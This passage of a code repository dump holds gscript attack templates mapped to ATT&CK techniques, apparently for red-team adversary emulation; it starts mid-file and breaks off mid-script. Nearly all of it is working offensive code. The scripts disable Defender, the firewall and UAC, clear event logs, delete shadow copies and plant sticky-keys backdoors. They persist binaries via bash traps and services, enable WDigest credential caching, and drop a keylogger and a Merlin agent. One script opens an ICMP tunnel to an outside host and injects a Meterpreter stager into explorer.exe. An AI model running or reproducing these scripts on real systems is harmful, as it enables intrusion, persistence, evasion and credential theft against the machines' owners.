7 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1148
8 |
9 | //go_import:os/user as user
10 | //go_import:os as os
11 |
12 | //priority:150
13 | //timeout:150
14 |
15 | function Deploy() {
16 | console.log("Starting Tamper Histcontrol");
17 |
18 | var histcontrol = "HISTCONTROL=ignorespace \n";
19 |
20 | var whoami = user.Current();
21 | var file_location = whoami[0].HomeDir+"/.bash_profile";
22 | console.log("File Location: "+ file_location);
23 |
24 | var exists = G.file.CheckExists(file_location);
25 | if ( exists == true ) {
26 | var obj = G.file.AppendFileString(file_location, histcontrol);
27 | if (obj != null) {
28 | console.log("errors: "+obj.Error());
29 | } else {
30 | console.log("file already exists so appended: " + file_location);
31 | }
32 | } else {
33 | var obj = G.file.WriteFileFromString(file_location, histcontrol);
34 | if (obj != null) {
35 | console.log("errors: "+obj.Error());
36 | } else {
37 | console.log("file newly created: " + file_location);
38 | }
39 | }
40 | console.log("Done Tamper Histcontrol");
41 | return true;
42 | }
43 |
--------------------------------------------------------------------------------
/attack/os_x/trap_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Trap Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and persist it using Trap
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1154
7 |
8 | //priority:90
9 | //timeout:150
10 |
11 | //go_import:os/user as user
12 |
13 | //import:/private/tmp/example.macho
14 |
15 | function Deploy() {
16 | console.log("Starting Trap Persistence");
17 |
18 | // Getting our asset
19 | var exampleBin = GetAssetAsBytes("example.macho");
20 | if (exampleBin[1] != null) {
21 | console.log("errors: "+exampleBin[1].Error());
22 | }
23 | // Getting a file name
24 | var temppath = os.TempDir();
25 | //var temppath = "/usr/local";
26 | var naming = G.rand.GetAlphaString(4);
27 | var name = naming.toLowerCase();
28 | name = temppath+"/"+name;
29 | var dropErr = G.file.WriteFileFromBytes(name, exampleBin[0]);
30 | if (dropErr != null) {
31 | console.log("errors: "+dropErr.Error());
32 | } else {
33 | console.log("dropped the example binary here: "+name);
34 | }
35 |
36 | // Persist our binary w/ a trap on SIGINT (signal 2), using .bash_profile to get it into the builtin shell
37 | var trap_string = "trap " + name + " 2 \n";
38 |
39 | // Get User Dir
40 | var whoami = user.Current();
41 | var file_location = whoami[0].HomeDir+"/.bash_profile";
42 | console.log("File Location: "+ file_location);
43 | var exists = G.file.CheckExists(file_location);
44 | if ( exists == true ) {
45 | var obj = G.file.AppendFileString(file_location, trap_string);
46 | if (obj != null) {
47 | console.log("errors: "+obj.Error());
48 | } else {
49 | console.log("file already exists so appended: " + file_location);
50 | console.log("Persisted binary using SIGINT trap: "+ name);
51 | }
52 | } else {
53 | var obj = G.file.WriteFileFromString(file_location, trap_string);
54 | if (obj != null) {
55 | console.log("errors: "+obj.Error());
56 | } else {
57 | console.log("file newly created: " + file_location);
58 | console.log("Persisted binary using SIGINT trap: "+ name);
59 | }
60 | }
61 | console.log("Done Trap persistence");
62 | return true;
63 | }
64 |
--------------------------------------------------------------------------------
/attack/os_x/xsvc_service_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: x/svc Service Persistence Example
3 | // Author: ahhh
4 | // Purpose: Uses the experemental svc library to install a service for persistence
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1050
7 |
8 | //priority:170
9 | //timeout:170
10 |
11 | //go_import:github.com/gen0cide/gscript/x/svc as svc
12 |
13 | //import:/private/tmp/example_svc.bin
14 |
15 | var service_bin_path = "/usr/local/svctest";
16 |
17 | var serviceSettings = {
18 | name: "gscript_example_service",
19 | display_name: "ges",
20 | description: "gscript example service",
21 | arguments: [],
22 | executable_path: service_bin_path,
23 | working_directory: "/usr/local/",
24 | options: {}
25 | }
26 |
27 | function Deploy() {
28 | console.log("Starting gscript x/svc persistence example");
29 |
30 | console.log("Writing binary to disk...");
31 | var filedata = GetAssetAsBytes("example_svc.bin");
32 | var errchk = G.file.WriteFileFromBytes(service_bin_path, filedata[0]);
33 | if (errchk !== undefined) {
34 | console.error("Error writing file: " + errchk.Error());
35 | DebugConsole();
36 | return false;
37 | }
38 |
39 | console.log("Creating new service object...");
40 | var svcObj = svc.NewFromJSON(serviceSettings);
41 | if (svcObj[1] !== undefined) {
42 | console.error("Error creating service: " + svcObj[1].Error());
43 | DebugConsole();
44 | return false;
45 | }
46 |
47 | console.log("Checking service config sanity...");
48 | var confchk = svcObj[0].CheckConfig(true);
49 | if (confchk[1] !== undefined || confchk[0] === false) {
50 | console.error("Error checking config: " + confchk[1].Error());
51 | DebugConsole();
52 | return false;
53 | }
54 |
55 | console.log("Installing service...");
56 | installchk = svcObj[0].Install(true);
57 | if (installchk !== undefined) {
58 | console.error("Error installing service: " + installchk.Error());
59 | DebugConsole();
60 | return false;
61 | }
62 |
63 | console.log("Starting service...");
64 | startchk = svcObj[0].Start();
65 | if (startchk !== undefined) {
66 | console.error("Error starting service: " + startchk.Error());
67 | DebugConsole();
68 | return false;
69 | }
70 |
71 | console.log("Done gscript x/svc persistence example");
72 | //DebugConsole();
73 | return true;
74 | }
75 |
76 |
--------------------------------------------------------------------------------
/attack/windows/Vyrus-Demo/epicMsf.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: CurrentVersion Run Persistence
3 | // Author: Vyrus
4 | // Purpose:
5 | // -Check if windows defender is running
6 | // -If it is, dissable it
7 | // -Drop / run ICMP tunnel
8 | // -Download stageless meterpreter payload via HTTPS / ICMP
9 | // -Inject meterpreter into explore.exe
10 | // Gscript version: 1.0.0
11 |
12 | //go_import:github.com/gen0cide/gscript/x/windows as windows
13 | //import:ptunnel.exe
14 | //import:cygwin1.dll
15 | //import:payload
16 |
17 | var ptun = "C:\\Windows\\Temp\\doNotDeleteMe.exe"
18 | var cygdll = "C:\\Windows\\Temp\\cygwin1.dll"
19 | var ptunHost = "192.168.0.21"
20 | var ptunPort = "4444"
21 |
22 | function checkErr(err) {
23 | if (err[3] != 0) {
24 | console.log(err[1])
25 | console.log(err[2])
26 | DebugConsole()
27 | return true
28 | }
29 | return false
30 | }
31 |
32 | function checkErrAsyncCmd(err) {
33 | if (err[1] != undefined) {
34 | console.log(err[1])
35 | }
36 | }
37 |
38 | function checkErrString(err) {
39 | if (err) {
40 | console.log(err)
41 | return true
42 | }
43 | return false
44 | }
45 |
46 | function Deploy() {
47 | // turn off firewall
48 | console.log("Starting Disable Windows Firewall");
49 | var cmdResult = G.exec.ExecuteCommand("netsh", ["advfirewall", "set", "allprofiles", "state", "off"]);
50 | if (checkErr(cmdResult)) return false
51 | console.log("Done Disable Windows Firewall");
52 |
53 | // check if defender is on
54 | wasDefenderOnWhenWeStarted = false
55 | cmdResult = G.exec.ExecuteCommand("powershell.exe", ["MpComputerStatus"]);
56 | if (checkErr(cmdResult)) return false
57 | var cmdLines = cmdResult[1].split('\n');
58 | for(var cmdLinesIndex = 0; cmdLinesIndex < cmdLines.length; cmdLinesIndex++) {
59 | if (cmdLines[cmdLinesIndex].indexOf("RealTimeProtectionEnabled") !== -1) {
60 | if (cmdLines[cmdLinesIndex].indexOf("True") !== -1) {
61 | wasDefenderOnWhenWeStarted = true
62 | }
63 | }
64 | }
65 |
66 | // turn defender off
67 | if (wasDefenderOnWhenWeStarted) {
68 | cmdResult = G.exec.ExecuteCommand("powershell.exe", ["Set-MpPreference -DisableRealtimeMonitoring $true"]); // this has to be done as admin in order to work
69 | if (checkErr(cmdResult)) return false;
70 | }
71 |
72 | // drop ptun
73 | console.log("Dropping the icmp tunnel binary...");
74 | cmdResult = G.file.WriteFileFromBytes(ptun, GetAssetAsBytes("ptunnel.exe")[0]); // this is horrible err handeling
75 | if (checkErrString(cmdResult)) return false;
76 |
77 | console.log("Dropping the icmp tunnel DLL...");
78 | cmdResult = G.file.WriteFileFromBytes(cygdll, GetAssetAsBytes("cygwin1.dll")[0]); // this is horrible err handeling
79 | if (checkErrString(cmdResult)) return false;
80 |
81 | // run ptun
82 | console.log("Starting icmp tunnel...");
83 | cmdResult = G.exec.ExecuteCommandAsync(ptun, ["-p", ptunHost, "-lp", "31337", "-da", "127.0.0.1", "-dp", ptunPort]);
84 | if (checkErrAsyncCmd(cmdResult)) return false;
85 |
86 | // get PID of explore.exe
87 | console.log("Looking up explorer.exe PID...");
88 | var cmdResult = G.exec.ExecuteCommand("powershell.exe", ["Get-Process explorer | select -expand id"]);
89 | if (checkErr(cmdResult)) return false;
90 | console.log("PID found!: " + cmdResult[1].replace(/(\r\n|\n|\r)/gm,""));
91 |
92 | // inject meterpreter
93 | console.log("Injecting msf shellcode stager into explorer.exe...")
94 | cmdResult = windows.InjectShellcode(Number(cmdResult[1]), GetAssetAsBytes("payload")[0]);
95 | if (checkErrString(cmdResult)) return false;
96 |
97 | // turn defender on
98 | if (wasDefenderOnWhenWeStarted) {
99 | cmdResult = G.exec.ExecuteCommand("powershell.exe", ["Set-MpPreference -DisableRealtimeMonitoring $false"]); // this has to be done as admin in order to work
100 | if (checkErr(cmdResult)) return false;
101 | }
102 | }
103 |
--------------------------------------------------------------------------------
/attack/windows/delete_event_logs.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Delete Event Logs
3 | // Author: ahhh
4 | // Purpose: Deletes a number of critical security event logs on a Windows machine
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1070
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | function Deploy() {
12 | console.log("starting execution of Delete Event Logs");
13 | var clear1 = G.exec.ExecuteCommandAsync("powershell.exe", ["Clear-EventLog", "Security, Application, System"]);
14 | console.log("errors: "+clear1[1]);
15 | var clear2 = G.exec.ExecuteCommandAsync("powershell.exe", ["Clear-EventLog", "Windows, PowerShell"]);
16 | console.log("errors: "+clear2[1]);
17 | var clear3 = G.exec.ExecuteCommandAsync("powershell.exe", ["Clear-EventLog", "Sysmon"]);
18 | console.log("errors: "+clear3[1]);
19 | console.log("Cleared Event Logs");
20 | return true;
21 | }
--------------------------------------------------------------------------------
/attack/windows/delete_volume_shadow_copy.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Delete Volume Shadow Copy
3 | // Author: ahhh
4 | // Purpose: Deletes the volume shadow copy with both wmic and vssadmin
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1107
7 |
8 | //priority:100
9 | //timeout:150
10 |
11 | var fn;
12 |
13 | function Deploy() {
14 | console.log("starting execution of Delete Volume Shadow Copy");
15 | // Delete the volume shadow copy with the vssadmin tool
16 | G.exec.ExecuteCommandAsync("vssadmin.exe", ["delete", "shadows", "/for=c:", "/oldest", "/quiet"]);
17 | console.log("Deleted the volume shadow copy with the vssadmin tool");
18 |
19 | // Delete the volume shadow copy with wmic
20 | G.exec.ExecuteCommandAsync("wmic.exe", ["shadowcopy", "delete", "/nointeractive"]);
21 | console.log("Deleted the volume shadow copy with wmic");
22 | console.log("done Deleting VSC");
23 | return true;
24 | }
25 |
--------------------------------------------------------------------------------
/attack/windows/disable_adminApprovalMode.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable Admin Approval Mode
3 | // Author: ahhh
4 | // Purpose: This will disable the admin approval mode
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:100
9 | //timeout:150
10 |
11 | //go_import:github.com/gen0cide/gscript/x/windows as windows
12 |
13 | function Deploy() {
14 | console.log("Starting Disable Admin Approval Mode");
15 |
16 | var value = 1
17 | // enable admin shares
18 | windows.AddRegKeyDWORD("LOCAL_MACHINE", "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "FilterAdministratorToken", value);
19 |
20 | console.log("Done Disable Admin Approval Mode");
21 | return true;
22 | }
23 |
--------------------------------------------------------------------------------
/attack/windows/disable_defender.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable Windows Defender
3 | // Author: ahhh
4 | // Purpose: This will disable some features of windows defender, such as anti-spyware, behavior monitoring, on access protection, and real time scanning
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:91
9 | //timeout:160
10 |
11 | //go_import:github.com/gen0cide/gscript/x/windows as windows
12 |
13 | function Deploy() {
14 | console.log("Starting Disable Windows Defender");
15 |
16 | var value = 1
17 | // enable admin shares
18 | windows.AddRegKeyDWORD("LOCAL_MACHINE", "SOFTWARE\\Policies\\Microsoft\\Windows Defender", "DisableAntiSpyware", value);
19 | windows.AddRegKeyDWORD("LOCAL_MACHINE", "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableBehaviorMonitoring", value);
20 | windows.AddRegKeyDWORD("LOCAL_MACHINE", "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableOnAccessProtection", value);
21 | windows.AddRegKeyDWORD("LOCAL_MACHINE", "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableScanOnRealtimeEnable", value);
22 |
23 | console.log("Done Disable Windows Defender");
24 | return true;
25 | }
26 |
27 |
28 |
--------------------------------------------------------------------------------
/attack/windows/disable_localAdminFilter.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable Local Admin Filter
3 | // Author: ahhh
4 | // Purpose: This will disable the local admin filter
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1089
7 |
8 | //priority:999
9 | //timeout:150
10 |
11 | //go_import:github.com/gen0cide/gscript/x/windows as windows
12 |
13 | function Deploy() {
14 | console.log("Starting Disable Local Admin Filter");
15 |
16 | var value = 1
17 | // enable admin shares
18 | windows.AddRegKeyDWORD("LOCAL_MACHINE", "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "LocalAccountTokenFilterPolicy", value);
19 |
20 | console.log("Done Disable Local Admin Filter");
21 | return true;
22 | }
23 |
--------------------------------------------------------------------------------
/attack/windows/disable_securityCenter.gs:
--------------------------------------------------------------------------------
1 |
2 |
3 | // Example gscript template
4 | // Title: Disable Security Center
5 | // Author: ahhh
6 | // Purpose: This will disable security center notifications
7 | // Gscript version: 1.0.0
8 | // ATT&CK:
9 | // Note: requires restart
10 |
11 | //priority:99
12 | //timeout:160
13 |
14 | //go_import:github.com/gen0cide/gscript/x/windows as windows
15 |
16 | function Deploy() {
17 | console.log("Starting Disable Security Center");
18 |
19 | var value4 = 4
20 | // enable admin shares
21 | windows.AddRegKeyDWORD("LOCAL_MACHINE", "SYSTEM\\CurrentControlSet\\Services\\SecurityHealthService", "Start", value4);
22 |
23 | console.log("Done Disable Security Center");
24 | return true;
25 | }
--------------------------------------------------------------------------------
/attack/windows/disable_uac.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable UAC
3 | // Author: ahhh
4 | // Purpose: Disable UAC
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1088
7 |
8 | //priority:92
9 | //timeout:150
10 |
11 | //go_import:github.com/gen0cide/gscript/x/windows as windows
12 |
13 | function Deploy() {
14 | console.log("Starting Disable UAC");
15 |
16 | var value = 0;
17 | // disable UAC
18 | windows.AddRegKeyDWORD("LOCAL_MACHINE", "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableUAC", value);
19 |
20 | console.log("Done Disable UAC");
21 | return true;
22 | }
23 |
--------------------------------------------------------------------------------
/attack/windows/disable_winUpdates.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable winUpdates
3 | // Author: ahhh
4 | // Purpose: Disables a bunch of windows updates
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:96
9 | //timeout:150
10 |
11 | //go_import:github.com/gen0cide/gscript/x/windows as windows
12 |
13 | function Deploy() {
14 | console.log("Starting Disable WinUpdates");
15 |
16 | var value1 = 1;
17 | var value2 = "http://127.0.0.1";
18 |
19 | windows.AddRegKeyDWORD("LOCAL_MACHINE", "SYSTEM\\Internet Communication Management\\Internet Communication", "DisableWindowsUpdateAccess", value1);
20 | windows.AddRegKeyDWORD("CURRENT_USER", "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WindowsUpdate", "DisableWindowsUpdateAccess", value1);
21 | windows.AddRegKeyDWORD("CURRENT_USER", "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", "NoWindowsUpdate", value1);
22 | windows.AddRegKeyDWORD("LOCAL_MACHINE", "SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", "UseWUServer", value1);
23 | windows.AddRegKeyDWORD("LOCAL_MACHINE", "SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", "AUOptions", value1);
24 | windows.AddRegKeyString("LOCAL_MACHINE", "SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", "WUServer", value2);
25 | windows.AddRegKeyString("LOCAL_MACHINE", "SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", "WUStatusServer", value2);
26 |
27 | console.log("Done Disable WinUpdates");
28 | return true;
29 | }
30 |
--------------------------------------------------------------------------------
/attack/windows/disable_windows_firewall.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable Windows Firewall
3 | // Author: ahhh
4 | // Purpose: Drops the windows firewall by turning it off.
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1089
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | function Deploy() {
12 | console.log("Starting Disable Windows Firewall");
13 | G.exec.ExecuteCommand("netsh", ["advfirewall", "set", "allprofiles", "state", "off"]);
14 | console.log("Done Disable Windows Firewall");
15 | return true;
16 | }
--------------------------------------------------------------------------------
/attack/windows/enable_adminShares.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Enable Admin Shares
3 | // Author: ahhh
4 | // Purpose: This will Enable Admin Shares
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1077
7 |
8 | //priority:97
9 | //timeout:150
10 |
11 | //go_import:github.com/gen0cide/gscript/x/windows as windows
12 |
13 | function Deploy() {
14 | console.log("Starting Enable Admin Shares");
15 |
16 | var value = 1
17 | // enable admin shares
18 | windows.AddRegKeyDWORD("LOCAL_MACHINE", "SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters", "AutoShareServer", value);
19 |
20 | windows.AddRegKeyDWORD("LOCAL_MACHINE", "SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters", "AutoShareWks", value);
21 |
22 | console.log("Done Enable Admin Shares");
23 | return true;
24 | }
25 |
--------------------------------------------------------------------------------
/attack/windows/enable_installElevated.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Always Install Elevated
3 | // Author: ahhh
4 | // Purpose: Always Install Elevated
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:98
9 | //timeout:150
10 |
11 | //go_import:github.com/gen0cide/gscript/x/windows as windows
12 |
13 | function Deploy() {
14 | console.log("Starting Install Elevated");
15 |
16 | var value = 1;
17 | windows.AddRegKeyDWORD("CURRENT_USER", "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer", "AlwaysInstallElevated", value);
18 | windows.AddRegKeyDWORD("LOCAL_MACHINE", "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer", "AlwaysInstallElevated", value);
19 |
20 | console.log("Done Install Elevated");
21 | return true;
22 | }
23 |
--------------------------------------------------------------------------------
/attack/windows/enable_rdp.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Enable RDP
3 | // Author: ahhh
4 | // Purpose: Enable RDP
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:98
9 | //timeout:150
10 |
11 | //go_import:github.com/ahhh/winsvc as winsvc
12 |
13 | function Deploy() {
14 | console.log("Starting Enable RDP");
15 |
16 | winsvc.StartService("TermService")
17 |
18 | console.log("Done Enable RDP");
19 | return true;
20 | }
21 |
22 |
--------------------------------------------------------------------------------
/attack/windows/enable_smbv1.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Enable SMBv1
3 | // Author: ahhh
4 | // Purpose: Enable SMBv1
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:95
9 | //timeout:150
10 |
11 | //go_import:github.com/gen0cide/gscript/x/windows as windows
12 |
13 | function Deploy() {
14 | console.log("Starting Enable SMBv1");
15 |
16 | var value = 1;
17 | windows.AddRegKeyDWORD("LOCAL_MACHINE", "SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters", "SMB1", value);
18 |
19 | console.log("Done Enable SMBv1");
20 | return true;
21 | }
22 |
--------------------------------------------------------------------------------
/attack/windows/enable_stickykeys.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Enable Sticky Keys
3 | // Author: ahhh
4 | // Purpose: Enables a bunch of sticky keys like accessability options with a backdoor on Windows
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1015
7 |
8 | //priority:110
9 | //timeout:150
10 |
11 | //go_import:github.com/gen0cide/gscript/x/windows as windows
12 |
13 | //import:/private/tmp/example.exe
14 |
15 | function Deploy() {
16 | console.log("Starting Enable Sticky Keys");
17 |
18 | // Prep the sample
19 | var example = GetAssetAsBytes("example.exe");
20 | var temppath = os.TempDir();
21 | var naming = G.rand.GetAlphaString(5);
22 | naming = naming.toLowerCase();
23 | var fullpath = temppath+"\\"+naming+".exe";
24 |
25 | // Drop the sample
26 | console.log("file name: "+ fullpath);
27 | errors = G.file.WriteFileFromBytes(fullpath, example[0]);
28 | console.log("errors: "+errors);
29 |
30 | windows.AddRegKeyString("LOCAL_MACHINE", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe", "Debugger", fullpath);
31 | windows.AddRegKeyString("LOCAL_MACHINE", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Utilman.exe", "Debugger", fullpath);
32 | windows.AddRegKeyString("LOCAL_MACHINE", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe", "Debugger", fullpath);
33 | windows.AddRegKeyString("LOCAL_MACHINE", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnifier.exe", "Debugger", fullpath);
34 | windows.AddRegKeyString("LOCAL_MACHINE", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\OSK.exe", "Debugger", fullpath);
35 | windows.AddRegKeyString("LOCAL_MACHINE", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe", "Debugger", fullpath);
36 |
37 | console.log("Done Enable Sticky Keys");
38 | return true;
39 | }
40 |
--------------------------------------------------------------------------------
/attack/windows/enable_wdigest_credcache.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Enable WDigest Credential Cache
3 | // Author: ahhh
4 | // Purpose: Enable WDigest Credential Cache
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:99
9 | //timeout:150
10 |
11 | //go_import:github.com/gen0cide/gscript/x/windows as windows
12 |
13 | function Deploy() {
14 | console.log("Starting Enable WDigest Credential Cache");
15 |
16 | var value = 1;
17 | windows.AddRegKeyDWORD("LOCAL_MACHINE", "SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest", "UseLogonCredential", value);
18 |
19 | console.log("Done Enable WDigest Credential Cache");
20 | return true;
21 | }
22 |
--------------------------------------------------------------------------------
/attack/windows/enable_winrm.gs:
--------------------------------------------------------------------------------
1 | // Example Enable WinRM
2 | // Title: Enable WinRM
3 | // Author: ahhh
4 | // Purpose: Enable WinRM
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:98
9 | //timeout:190
10 |
11 | function Deploy() {
12 | console.log("Starting Enable WinRM");
13 |
14 | G.exec.ExecuteCommand("powershell", ["-ExecutionPolicy", "bypass", "-c", "Enable-PSRemoting", "-force"])
15 | G.exec.ExecuteCommand("powershell", ["-ExecutionPolicy", "bypass", "-c", "winrm", "quickconfig", "-quiet"])
16 | G.exec.ExecuteCommand("powershell", ["-ExecutionPolicy", "bypass", "-c", "Set-Item", "-force", "wsman:\localhost\client\trustedhosts *"])
17 | G.exec.ExecuteCommand("powershell", ["-ExecutionPolicy", "bypass", "-c", "restart-service", "-force", "WinRM"])
18 |
19 | console.log("Done Enable WinRM");
20 | return true;
21 | }
22 |
--------------------------------------------------------------------------------
/attack/windows/force_hidden_files.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Force Hidden Files
3 | // Author: ahhh
4 | // Purpose: Forces Hidden Files on Windows
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1158#Windows
7 |
8 | //priority:105
9 | //timeout:150
10 |
11 | //go_import:github.com/gen0cide/gscript/x/windows as windows
12 |
13 | function Deploy() {
14 | console.log("Starting Force Hidden Files");
15 |
16 | var value = 0;
17 | var value1 = 1;
18 | // disable showing hidden files
19 | windows.AddRegKeyDWORD("LOCAL_MACHINE", "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN", "CheckedValue", value);
20 | windows.AddRegKeyDWORD("LOCAL_MACHINE", "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN", "DefaultValue", value);
21 | windows.AddRegKeyDWORD("LOCAL_MACHINE", "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL", "CheckedValue", value);
22 | windows.AddRegKeyDWORD("LOCAL_MACHINE", "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL", "DefaultValue", value);
23 | windows.AddRegKeyDWORD("LOCAL_MACHINE", "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SuperHidden", "CheckedValue", value);
24 | windows.AddRegKeyDWORD("LOCAL_MACHINE", "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SuperHidden", "DefaultValue", value);
25 | windows.AddRegKeyDWORD("LOCAL_MACHINE", "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", "NoFolderOptions", value1);
26 |
27 | console.log("Done Force Hidden Files");
28 | return true;
29 | }
30 |
31 |
--------------------------------------------------------------------------------
/attack/windows/keylog_spy.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Keylog Spy
3 | // Author: ahhh
4 | // Purpose: keylogger!
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1056
7 | // Using ShyGuy:
8 |
9 | //priority:150
10 | //timeout:150
11 | //import:/private/tmp/ShyGuy_x64.dll
12 | //go_import:os as os
13 |
14 | function Deploy() {
15 | console.log("Starting Keylog");
16 |
17 | // Prep the sample
18 | var spy = GetAssetAsBytes("ShyGuy_x64.dll");
19 | // Getting a temp file path
20 | var temppath = os.TempDir();
21 | var naming = G.rand.GetAlphaString(4);
22 | naming = naming.toLowerCase();
23 | var fullpath = temppath+naming+".dll";
24 |
25 | // Write the sample
26 | console.log("file name: "+ fullpath);
27 | errors = G.file.WriteFileFromBytes(fullpath, spy[0]);
28 | console.log("errors: "+errors);
29 |
30 | var cmd = fullpath + ",dllmain";
31 | var running = G.exec.ExecuteCommandAsync("C:\\Windows\\System32\\rundll32.exe", [cmd]);
32 | console.log("errors: "+running[1]);
33 |
34 | console.log("Done Keylog");
35 | return true;
36 | }
37 |
--------------------------------------------------------------------------------
/attack/windows/merlin_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Merlin Example
3 | // Author: ahhh
4 | // Purpose: Drops merlin as an asset and executes it async
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 | //import:/private/tmp/merlinagent.exe
11 | //go_import:os as os2
12 |
13 | function Deploy() {
14 |
15 | console.log("Starting to drop merlin binary");
16 | // Getting our asset
17 | var merlinBin = GetAssetAsBytes("merlinagent.exe");
18 | console.log("errors: "+merlinBin[1]);
19 |
20 | // Getting a random string
21 | DebugConsole();
22 | var temppath = os2.TempDir();
23 | var naming = G.rand.GetAlphaString(4);
24 | //var naming = "blabla";
25 | naming = naming.toLowerCase();
26 | var fullpath = temppath+"//"+naming+".exe";
27 | console.log("file name: "+ fullpath);
28 |
29 | errors = G.file.WriteFileFromBytes(fullpath, merlinBin[0]);
30 | console.log("errors: "+errors);
31 |
32 | var running = G.exec.ExecuteCommandAsync(fullpath, [""]);
33 | console.log("errors: "+running[1]);
34 |
35 | return true
36 | }
--------------------------------------------------------------------------------
/attack/windows/net_user_creation.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Net User Creation
3 | // Author: ahhh
4 | // Purpose: add a local user, domain user, add them to local administrators and domain administrators groups
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1136
7 |
8 | //priority:100
9 | //timeout:150
10 |
11 | var fn;
12 |
13 | function Deploy() {
14 | console.log("starting execution of Net User Creation");
15 | // Add a local user
